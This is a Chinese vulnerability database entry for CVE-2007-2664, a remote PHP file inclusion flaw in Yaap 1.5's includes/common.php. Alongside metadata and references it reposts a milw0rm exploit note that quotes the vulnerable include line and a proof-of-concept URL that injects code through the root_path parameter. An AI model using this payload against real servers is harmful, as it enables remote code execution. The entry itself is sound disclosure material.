Yaap 'common.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112927 漏洞类型 未知
发布时间 2007-05-12 更新时间 2007-05-14
CVE编号 CVE-2007-2664 CNNVD-ID CNNVD-200705-294
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3908
https://www.securityfocus.com/bid/86168
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-294
|漏洞详情
Yaap的includes/common.php中存在PHP远程文件包含漏洞。远程攻击者可以借助root_path参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
--------------------------------------------------------------------------------
Script name.......:Yaap
Affected Version.....:1.5
D.page..:http://yaap.oskbraniewo.pl/download/yaap_15.tar.gz
--------------------------------------------------------------------------------
Author:3l3ctric-Cracker  (Dr Max Virus) :D
Contact:drmaxvirus@w.cn
--------------------------------------------------------------------------------
Bug in:\public_html\includes\common.php
Vul Code:
include_once($root_path.'/classes/'.$class_name.'.php');
----------------------------------------------------------------------------------
POC:
http:[target]/[path]/includes/common.php?root_path=ShellCode
-----------------------------------------------------------------------------------

# milw0rm.com [2007-05-12]
|受影响的产品
Tomasz Rekawek Yet Another Asterisk Panel 1.5
|参考资料

来源:XF
名称:yaap-common-file-include(34264)
链接:http://xforce.iss.net/xforce/xfdb/34264
来源:MILW0RM
名称:3908
链接:http://www.milw0rm.com/exploits/3908
来源:VUPEN
名称:ADV-2007-1797
链接:http://www.frsirt.com/english/advisories/2007/1797
来源:SECUNIA
名称:25254
链接:http://secunia.com/advisories/25254
来源:OSVDB
名称:36060
链接:http://osvdb.org/36060